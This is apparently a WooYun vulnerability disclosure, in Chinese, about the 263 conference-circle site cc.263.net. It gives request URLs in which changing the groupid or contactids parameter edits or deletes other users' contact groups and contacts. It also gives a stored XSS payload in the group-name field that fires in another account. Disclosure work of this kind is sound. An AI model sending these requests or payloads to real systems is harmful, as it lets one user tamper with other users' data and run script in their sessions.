WooYun.org

二六三会议圈
首先注册两个账号用来测试
http://cc.263.net/toRegist
账号一：张三
账号二：李四
1、张三登录系统，在个人通讯录中添加组管理，发现用户组信息可越权：

2、修改用户组

http://cc.263.net/ajaxAddContactGroups?groupid=69&groupname=%E5%BC%A0%E4%B8%89%E7%9A%84%E7%94%A8%E6%88%B7%E7%BB%841
参数groupid可以任意修改并修改成功
3、删除用户组
http://cc.263.net/ajaxDeleteContactGroups?groupid=71
参数groupid可以任意修改并删除成功
4、用户联系人也可越权修改、删除

http://cc.263.net/ajaxModifyPerson?addrname=%E7%8E%8B%E4%BA%94&contactids=38208&description=&email=&groupId=72&phonenum=13530018941&phonenum1=
参数contactids可任意修改,并修改成功
http://cc.263.net/deletePerson?contactids=38208
参数contactids可任意修改,并删除成功
5、XSS测试，客户端js有验证，但是服务端没有验证，很容易绕过

抓包获取修改组名提交地址
http://cc.263.net/ajaxAddContactGroups?groupid=73&groupname=%E7%BB%84%3Cscript%3Ealert%28/xss/%29%3C/script%3E
修改参数groupname的值为组<script>alert(/xss/)</script>
然后groupid任意修改，可保存成功，这里修改为李四的groupid，登录李四的账号，加载XSS成功